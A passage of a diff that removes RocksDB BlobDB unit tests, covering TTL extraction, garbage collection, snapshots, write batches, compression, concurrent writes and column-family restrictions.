-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, PutWithTTL) {
-  Random rnd(301);
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = 1000;
-  bdb_options.min_blob_size = 0;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  std::map<std::string, std::string> data;
-  mock_env_->set_current_time(50);
-  for (size_t i = 0; i < 100; i++) {
-    uint64_t ttl = rnd.Next() % 100;
-    PutRandomWithTTL("key" + ToString(i), ttl, &rnd,
-                     (ttl <= 50 ? nullptr : &data));
-  }
-  mock_env_->set_current_time(100);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_TRUE(blob_files[0]->HasTTL());
-  ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0]));
-  GCStats gc_stats;
-  ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(100 - data.size(), gc_stats.num_deletes);
-  ASSERT_EQ(data.size(), gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, PutUntil) {
-  Random rnd(301);
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = 1000;
-  bdb_options.min_blob_size = 0;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  std::map<std::string, std::string> data;
-  mock_env_->set_current_time(50);
-  for (size_t i = 0; i < 100; i++) {
-    uint64_t expiration = rnd.Next() % 100 + 50;
-    PutRandomUntil("key" + ToString(i), expiration, &rnd,
-                   (expiration <= 100 ? nullptr : &data));
-  }
-  mock_env_->set_current_time(100);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_TRUE(blob_files[0]->HasTTL());
-  ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0]));
-  GCStats gc_stats;
-  ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(100 - data.size(), gc_stats.num_deletes);
-  ASSERT_EQ(data.size(), gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, TTLExtrator_NoTTL) {
-  // The default ttl extractor return no ttl for every key.
-  ttl_extractor_.reset(new TTLExtractor());
-  Random rnd(301);
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = 1000;
-  bdb_options.min_blob_size = 0;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.ttl_extractor = ttl_extractor_;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  std::map<std::string, std::string> data;
-  mock_env_->set_current_time(0);
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  // very far in the future..
-  mock_env_->set_current_time(std::numeric_limits<uint64_t>::max() / 1000000 -
-                              10);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_FALSE(blob_files[0]->HasTTL());
-  ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0]));
-  GCStats gc_stats;
-  ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(0, gc_stats.num_deletes);
-  ASSERT_EQ(100, gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) {
-  Random rnd(301);
-  class TestTTLExtractor : public TTLExtractor {
-   public:
-    explicit TestTTLExtractor(Random *r) : rnd(r) {}
-
-    virtual bool ExtractTTL(const Slice &key, const Slice &value, uint64_t *ttl,
-                            std::string * /*new_value*/,
-                            bool * /*value_changed*/) override {
-      *ttl = rnd->Next() % 100;
-      if (*ttl > 50) {
-        data[key.ToString()] = value.ToString();
-      }
-      return true;
-    }
-
-    Random *rnd;
-    std::map<std::string, std::string> data;
-  };
-  ttl_extractor_.reset(new TestTTLExtractor(&rnd));
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = 1000;
-  bdb_options.min_blob_size = 0;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.ttl_extractor = ttl_extractor_;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  mock_env_->set_current_time(50);
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd);
-  }
-  mock_env_->set_current_time(100);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_TRUE(blob_files[0]->HasTTL());
-  ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0]));
-  GCStats gc_stats;
-  ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  auto &data = static_cast<TestTTLExtractor *>(ttl_extractor_.get())->data;
-  ASSERT_EQ(100 - data.size(), gc_stats.num_deletes);
-  ASSERT_EQ(data.size(), gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) {
-  Random rnd(301);
-  class TestTTLExtractor : public TTLExtractor {
-   public:
-    explicit TestTTLExtractor(Random *r) : rnd(r) {}
-
-    virtual bool ExtractExpiration(const Slice &key, const Slice &value,
-                                   uint64_t /*now*/, uint64_t *expiration,
-                                   std::string * /*new_value*/,
-                                   bool * /*value_changed*/) override {
-      *expiration = rnd->Next() % 100 + 50;
-      if (*expiration > 100) {
-        data[key.ToString()] = value.ToString();
-      }
-      return true;
-    }
-
-    Random *rnd;
-    std::map<std::string, std::string> data;
-  };
-  ttl_extractor_.reset(new TestTTLExtractor(&rnd));
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = 1000;
-  bdb_options.min_blob_size = 0;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.ttl_extractor = ttl_extractor_;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  mock_env_->set_current_time(50);
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd);
-  }
-  mock_env_->set_current_time(100);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_TRUE(blob_files[0]->HasTTL());
-  ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0]));
-  GCStats gc_stats;
-  ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  auto &data = static_cast<TestTTLExtractor *>(ttl_extractor_.get())->data;
-  ASSERT_EQ(100 - data.size(), gc_stats.num_deletes);
-  ASSERT_EQ(data.size(), gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, TTLExtractor_ChangeValue) {
-  class TestTTLExtractor : public TTLExtractor {
-   public:
-    const Slice kTTLSuffix = Slice("ttl:");
-
-    bool ExtractTTL(const Slice & /*key*/, const Slice &value, uint64_t *ttl,
-                    std::string *new_value, bool *value_changed) override {
-      if (value.size() < 12) {
-        return false;
-      }
-      const char *p = value.data() + value.size() - 12;
-      if (kTTLSuffix != Slice(p, 4)) {
-        return false;
-      }
-      *ttl = DecodeFixed64(p + 4);
-      *new_value = Slice(value.data(), value.size() - 12).ToString();
-      *value_changed = true;
-      return true;
-    }
-  };
-  Random rnd(301);
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = 1000;
-  bdb_options.min_blob_size = 0;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.ttl_extractor = std::make_shared<TestTTLExtractor>();
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  std::map<std::string, std::string> data;
-  mock_env_->set_current_time(50);
-  for (size_t i = 0; i < 100; i++) {
-    int len = rnd.Next() % kMaxBlobSize + 1;
-    std::string key = "key" + ToString(i);
-    std::string value = test::RandomHumanReadableString(&rnd, len);
-    uint64_t ttl = rnd.Next() % 100;
-    std::string value_ttl = value + "ttl:";
-    PutFixed64(&value_ttl, ttl);
-    ASSERT_OK(blob_db_->Put(WriteOptions(), Slice(key), Slice(value_ttl)));
-    if (ttl > 50) {
-      data[key] = value;
-    }
-  }
-  mock_env_->set_current_time(100);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_TRUE(blob_files[0]->HasTTL());
-  ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0]));
-  GCStats gc_stats;
-  ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(100 - data.size(), gc_stats.num_deletes);
-  ASSERT_EQ(data.size(), gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, StackableDBGet) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  for (size_t i = 0; i < 100; i++) {
-    StackableDB *db = blob_db_;
-    ColumnFamilyHandle *column_family = db->DefaultColumnFamily();
-    std::string key = "key" + ToString(i);
-    PinnableSlice pinnable_value;
-    ASSERT_OK(db->Get(ReadOptions(), column_family, key, &pinnable_value));
-    std::string string_value;
-    ASSERT_OK(db->Get(ReadOptions(), column_family, key, &string_value));
-    ASSERT_EQ(string_value, pinnable_value.ToString());
-    ASSERT_EQ(string_value, data[key]);
-  }
-}
-
-TEST_F(BlobDBTest, WriteBatch) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    WriteBatch batch;
-    for (size_t j = 0; j < 10; j++) {
-      PutRandomToWriteBatch("key" + ToString(j * 100 + i), &rnd, &batch, &data);
-    }
-    blob_db_->Write(WriteOptions(), &batch);
-  }
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, Delete) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  for (size_t i = 0; i < 100; i += 5) {
-    Delete("key" + ToString(i), &data);
-  }
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, DeleteBatch) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd);
-  }
-  WriteBatch batch;
-  for (size_t i = 0; i < 100; i++) {
-    batch.Delete("key" + ToString(i));
-  }
-  ASSERT_OK(blob_db_->Write(WriteOptions(), &batch));
-  // DB should be empty.
-  VerifyDB({});
-}
-
-TEST_F(BlobDBTest, Override) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (int i = 0; i < 10000; i++) {
-    PutRandom("key" + ToString(i), &rnd, nullptr);
-  }
-  // override all the keys
-  for (int i = 0; i < 10000; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  VerifyDB(data);
-}
-
-#ifdef SNAPPY
-TEST_F(BlobDBTest, Compression) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  bdb_options.compression = CompressionType::kSnappyCompression;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("put-key" + ToString(i), &rnd, &data);
-  }
-  for (int i = 0; i < 100; i++) {
-    WriteBatch batch;
-    for (size_t j = 0; j < 10; j++) {
-      PutRandomToWriteBatch("write-batch-key" + ToString(j * 100 + i), &rnd,
-                            &batch, &data);
-    }
-    blob_db_->Write(WriteOptions(), &batch);
-  }
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, DecompressAfterReopen) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  bdb_options.compression = CompressionType::kSnappyCompression;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("put-key" + ToString(i), &rnd, &data);
-  }
-  VerifyDB(data);
-  bdb_options.compression = CompressionType::kNoCompression;
-  Reopen(bdb_options);
-  VerifyDB(data);
-}
-
-#endif
-
-TEST_F(BlobDBTest, MultipleWriters) {
-  Open(BlobDBOptions());
-
-  std::vector<port::Thread> workers;
-  std::vector<std::map<std::string, std::string>> data_set(10);
-  for (uint32_t i = 0; i < 10; i++)
-    workers.push_back(port::Thread(
-        [&](uint32_t id) {
-          Random rnd(301 + id);
-          for (int j = 0; j < 100; j++) {
-            std::string key = "key" + ToString(id) + "_" + ToString(j);
-            if (id < 5) {
-              PutRandom(key, &rnd, &data_set[id]);
-            } else {
-              WriteBatch batch;
-              PutRandomToWriteBatch(key, &rnd, &batch, &data_set[id]);
-              blob_db_->Write(WriteOptions(), &batch);
-            }
-          }
-        },
-        i));
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 10; i++) {
-    workers[i].join();
-    data.insert(data_set[i].begin(), data_set[i].end());
-  }
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, GCAfterOverwriteKeys) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  DBImpl *db_impl = static_cast_with_check<DBImpl, DB>(blob_db_->GetBaseDB());
-  std::map<std::string, std::string> data;
-  for (int i = 0; i < 200; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  auto blob_files = blob_db_impl()->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0]));
-  // Test for data in SST
-  size_t new_keys = 0;
-  for (int i = 0; i < 100; i++) {
-    if (rnd.Next() % 2 == 1) {
-      new_keys++;
-      PutRandom("key" + ToString(i), &rnd, &data);
-    }
-  }
-  db_impl->TEST_FlushMemTable(true /*wait*/);
-  // Test for data in memtable
-  for (int i = 100; i < 200; i++) {
-    if (rnd.Next() % 2 == 1) {
-      new_keys++;
-      PutRandom("key" + ToString(i), &rnd, &data);
-    }
-  }
-  GCStats gc_stats;
-  ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(200, gc_stats.blob_count);
-  ASSERT_EQ(0, gc_stats.num_deletes);
-  ASSERT_EQ(200 - new_keys, gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v1"));
-  auto blob_files = blob_db_impl()->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0]));
-
-  SyncPoint::GetInstance()->LoadDependency(
-      {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB",
-        "BlobDBImpl::PutUntil:Start"},
-       {"BlobDBImpl::PutUntil:Finish",
-        "BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"}});
-  SyncPoint::GetInstance()->EnableProcessing();
-
-  auto writer = port::Thread(
-      [this]() { ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v2")); });
-
-  GCStats gc_stats;
-  ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(1, gc_stats.blob_count);
-  ASSERT_EQ(0, gc_stats.num_deletes);
-  ASSERT_EQ(1, gc_stats.num_relocate);
-  ASSERT_EQ(0, gc_stats.relocate_succeeded);
-  ASSERT_EQ(1, gc_stats.overwritten_while_relocate);
-  writer.join();
-  VerifyDB({{"foo", "v2"}});
-}
-
-TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) {
-  Random rnd(301);
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  mock_env_->set_current_time(100);
-  ASSERT_OK(blob_db_->PutUntil(WriteOptions(), "foo", "v1", 200));
-  auto blob_files = blob_db_impl()->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0]));
-  mock_env_->set_current_time(300);
-
-  SyncPoint::GetInstance()->LoadDependency(
-      {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB",
-        "BlobDBImpl::PutUntil:Start"},
-       {"BlobDBImpl::PutUntil:Finish",
-        "BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"}});
-  SyncPoint::GetInstance()->EnableProcessing();
-
-  auto writer = port::Thread([this]() {
-    ASSERT_OK(blob_db_->PutUntil(WriteOptions(), "foo", "v2", 400));
-  });
-
-  GCStats gc_stats;
-  ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(1, gc_stats.blob_count);
-  ASSERT_EQ(1, gc_stats.num_deletes);
-  ASSERT_EQ(0, gc_stats.delete_succeeded);
-  ASSERT_EQ(1, gc_stats.overwritten_while_delete);
-  ASSERT_EQ(0, gc_stats.num_relocate);
-  writer.join();
-  VerifyDB({{"foo", "v2"}});
-}
-
-// This test is no longer valid since we now return an error when we go
-// over the configured blob_dir_size.
-// The test needs to be re-written later in such a way that writes continue
-// after a GC happens.
-TEST_F(BlobDBTest, DISABLED_GCOldestSimpleBlobFileWhenOutOfSpace) {
-  // Use mock env to stop wall clock.
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.blob_dir_size = 100;
-  bdb_options.blob_file_size = 100;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::string value(100, 'v');
-  ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key_with_ttl", value, 60));
-  for (int i = 0; i < 10; i++) {
-    ASSERT_OK(blob_db_->Put(WriteOptions(), "key" + ToString(i), value));
-  }
-  auto blob_files = blob_db_impl()->TEST_GetBlobFiles();
-  ASSERT_EQ(11, blob_files.size());
-  ASSERT_TRUE(blob_files[0]->HasTTL());
-  ASSERT_TRUE(blob_files[0]->Immutable());
-  for (int i = 1; i <= 10; i++) {
-    ASSERT_FALSE(blob_files[i]->HasTTL());
-    if (i < 10) {
-      ASSERT_TRUE(blob_files[i]->Immutable());
-    }
-  }
-  blob_db_impl()->TEST_RunGC();
-  // The oldest simple blob file (i.e. blob_files[1]) has been selected for GC.
-  auto obsolete_files = blob_db_impl()->TEST_GetObsoleteFiles();
-  ASSERT_EQ(1, obsolete_files.size());
-  ASSERT_EQ(blob_files[1]->BlobFileNumber(),
-            obsolete_files[0]->BlobFileNumber());
-}
-
-TEST_F(BlobDBTest, ReadWhileGC) {
-  // run the same test for Get(), MultiGet() and Iterator each.
-  for (int i = 0; i < 2; i++) {
-    BlobDBOptions bdb_options;
-    bdb_options.min_blob_size = 0;
-    bdb_options.disable_background_tasks = true;
-    Open(bdb_options);
-    blob_db_->Put(WriteOptions(), "foo", "bar");
-    auto blob_files = blob_db_impl()->TEST_GetBlobFiles();
-    ASSERT_EQ(1, blob_files.size());
-    std::shared_ptr<BlobFile> bfile = blob_files[0];
-    uint64_t bfile_number = bfile->BlobFileNumber();
-    ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(bfile));
-
-    switch (i) {
-      case 0:
-        SyncPoint::GetInstance()->LoadDependency(
-            {{"BlobDBImpl::Get:AfterIndexEntryGet:1",
-              "BlobDBTest::ReadWhileGC:1"},
-             {"BlobDBTest::ReadWhileGC:2",
-              "BlobDBImpl::Get:AfterIndexEntryGet:2"}});
-        break;
-      case 1:
-        SyncPoint::GetInstance()->LoadDependency(
-            {{"BlobDBIterator::UpdateBlobValue:Start:1",
-              "BlobDBTest::ReadWhileGC:1"},
-             {"BlobDBTest::ReadWhileGC:2",
-              "BlobDBIterator::UpdateBlobValue:Start:2"}});
-        break;
-    }
-    SyncPoint::GetInstance()->EnableProcessing();
-
-    auto reader = port::Thread([this, i]() {
-      std::string value;
-      std::vector<std::string> values;
-      std::vector<Status> statuses;
-      switch (i) {
-        case 0:
-          ASSERT_OK(blob_db_->Get(ReadOptions(), "foo", &value));
-          ASSERT_EQ("bar", value);
-          break;
-        case 1:
-          // VerifyDB use iterator to scan the DB.
-          VerifyDB({{"foo", "bar"}});
-          break;
-      }
-    });
-
-    TEST_SYNC_POINT("BlobDBTest::ReadWhileGC:1");
-    GCStats gc_stats;
-    ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(bfile, &gc_stats));
-    ASSERT_EQ(1, gc_stats.blob_count);
-    ASSERT_EQ(1, gc_stats.num_relocate);
-    ASSERT_EQ(1, gc_stats.relocate_succeeded);
-    blob_db_impl()->TEST_DeleteObsoleteFiles();
-    // The file shouln't be deleted
-    blob_files = blob_db_impl()->TEST_GetBlobFiles();
-    ASSERT_EQ(2, blob_files.size());
-    ASSERT_EQ(bfile_number, blob_files[0]->BlobFileNumber());
-    auto obsolete_files = blob_db_impl()->TEST_GetObsoleteFiles();
-    ASSERT_EQ(1, obsolete_files.size());
-    ASSERT_EQ(bfile_number, obsolete_files[0]->BlobFileNumber());
-    TEST_SYNC_POINT("BlobDBTest::ReadWhileGC:2");
-    reader.join();
-    SyncPoint::GetInstance()->DisableProcessing();
-
-    // The file is deleted this time
-    blob_db_impl()->TEST_DeleteObsoleteFiles();
-    blob_files = blob_db_impl()->TEST_GetBlobFiles();
-    ASSERT_EQ(1, blob_files.size());
-    ASSERT_NE(bfile_number, blob_files[0]->BlobFileNumber());
-    ASSERT_EQ(0, blob_db_impl()->TEST_GetObsoleteFiles().size());
-    VerifyDB({{"foo", "bar"}});
-    Destroy();
-  }
-}
-
-TEST_F(BlobDBTest, SnapshotAndGarbageCollection) {
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  // i = when to take snapshot
-  for (int i = 0; i < 4; i++) {
-    for (bool delete_key : {true, false}) {
-      const Snapshot *snapshot = nullptr;
-      Destroy();
-      Open(bdb_options);
-      // First file
-      ASSERT_OK(Put("key1", "value"));
-      if (i == 0) {
-        snapshot = blob_db_->GetSnapshot();
-      }
-      auto blob_files = blob_db_impl()->TEST_GetBlobFiles();
-      ASSERT_EQ(1, blob_files.size());
-      ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0]));
-      // Second file
-      ASSERT_OK(Put("key2", "value"));
-      if (i == 1) {
-        snapshot = blob_db_->GetSnapshot();
-      }
-      blob_files = blob_db_impl()->TEST_GetBlobFiles();
-      ASSERT_EQ(2, blob_files.size());
-      auto bfile = blob_files[1];
-      ASSERT_FALSE(bfile->Immutable());
-      ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(bfile));
-      // Third file
-      ASSERT_OK(Put("key3", "value"));
-      if (i == 2) {
-        snapshot = blob_db_->GetSnapshot();
-      }
-      if (delete_key) {
-        Delete("key2");
-      }
-      GCStats gc_stats;
-      ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(bfile, &gc_stats));
-      ASSERT_TRUE(bfile->Obsolete());
-      ASSERT_EQ(1, gc_stats.blob_count);
-      if (delete_key) {
-        ASSERT_EQ(0, gc_stats.num_relocate);
-        ASSERT_EQ(bfile->GetSequenceRange().second + 1,
-                  bfile->GetObsoleteSequence());
-      } else {
-        ASSERT_EQ(1, gc_stats.num_relocate);
-        ASSERT_EQ(blob_db_->GetLatestSequenceNumber(),
-                  bfile->GetObsoleteSequence());
-      }
-      if (i == 3) {
-        snapshot = blob_db_->GetSnapshot();
-      }
-      size_t num_files = delete_key ? 3 : 4;
-      ASSERT_EQ(num_files, blob_db_impl()->TEST_GetBlobFiles().size());
-      blob_db_impl()->TEST_DeleteObsoleteFiles();
-      if (i == 0 || i == 3 || (i == 2 && delete_key)) {
-        // The snapshot shouldn't see data in bfile
-        ASSERT_EQ(num_files - 1, blob_db_impl()->TEST_GetBlobFiles().size());
-        blob_db_->ReleaseSnapshot(snapshot);
-      } else {
-        // The snapshot will see data in bfile, so the file shouldn't be deleted
-        ASSERT_EQ(num_files, blob_db_impl()->TEST_GetBlobFiles().size());
-        blob_db_->ReleaseSnapshot(snapshot);
-        blob_db_impl()->TEST_DeleteObsoleteFiles();
-        ASSERT_EQ(num_files - 1, blob_db_impl()->TEST_GetBlobFiles().size());
-      }
-    }
-  }
-}
-
-TEST_F(BlobDBTest, ColumnFamilyNotSupported) {
-  Options options;
-  options.env = mock_env_.get();
-  mock_env_->set_current_time(0);
-  Open(BlobDBOptions(), options);
-  ColumnFamilyHandle *default_handle = blob_db_->DefaultColumnFamily();
-  ColumnFamilyHandle *handle = nullptr;
-  std::string value;
-  std::vector<std::string> values;
-  // The call simply pass through to base db. It should succeed.
-  ASSERT_OK(
-      blob_db_->CreateColumnFamily(ColumnFamilyOptions(), "foo", &handle));
-  ASSERT_TRUE(blob_db_->Put(WriteOptions(), handle, "k", "v").IsNotSupported());
-  ASSERT_TRUE(blob_db_->PutWithTTL(WriteOptions(), handle, "k", "v", 60)
-                  .IsNotSupported());
-  ASSERT_TRUE(blob_db_->PutUntil(WriteOptions(), handle, "k", "v", 100)
-                  .IsNotSupported());
-  WriteBatch batch;
-  batch.Put("k1", "v1");
-  batch.Put(handle, "k2", "v2");
-  ASSERT_TRUE(blob_db_->Write(WriteOptions(), &batch).IsNotSupported());
-  ASSERT_TRUE(blob_db_->Get(ReadOptions(), "k1", &value).IsNotFound());
-  ASSERT_TRUE(
-      blob_db_->Get(ReadOptions(), handle, "k", &value).IsNotSupported());
-  auto statuses = blob_db_->MultiGet(ReadOptions(), {default_handle, handle},
-                                     {"k1", "k2"}, &values);
-  ASSERT_EQ(2, statuses.size());
-  ASSERT_TRUE(statuses[0].IsNotSupported());
-  ASSERT_TRUE(statuses[1].IsNotSupported());
-  ASSERT_EQ(nullptr, blob_db_->NewIterator(ReadOptions(), handle));
-  delete handle;
-}
-
-TEST_F(BlobDBTest, GetLiveFilesMetaData) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  std::vector<LiveFileMetaData> metadata;
-  bdb_impl->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(1U, metadata.size());
-  std::string filename = dbname_ + "/blob_dir/000001.blob";
-  ASSERT_EQ(filename, metadata[0].name);
-  ASSERT_EQ("default", metadata[0].column_family_name);
-  std::vector<std::string> livefile;
-  uint64_t mfs;
-  bdb_impl->GetLiveFiles(livefile, &mfs, false);
-  ASSERT_EQ(4U, livefile.size());
-  ASSERT_EQ(filename, livefile[3]);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, MigrateFromPlainRocksDB) {
-  constexpr size_t kNumKey = 20;
-  constexpr size_t kNumIteration = 10;
-  Random rnd(301);
-  std::map<std::string, std::string> data;
-  std::vector<bool> is_blob(kNumKey, false);
-
-  // Write to plain rocksdb.
-  Options options;
-  options.create_if_missing = true;
-  DB *db = nullptr;
-  ASSERT_OK(DB::Open(options, dbname_, &db));
-  for (size_t i = 0; i < kNumIteration; i++) {
-    auto key_index = rnd.Next() % kNumKey;
-    std::string key = "key" + ToString(key_index);
-    PutRandom(db, key, &rnd, &data);
-  }
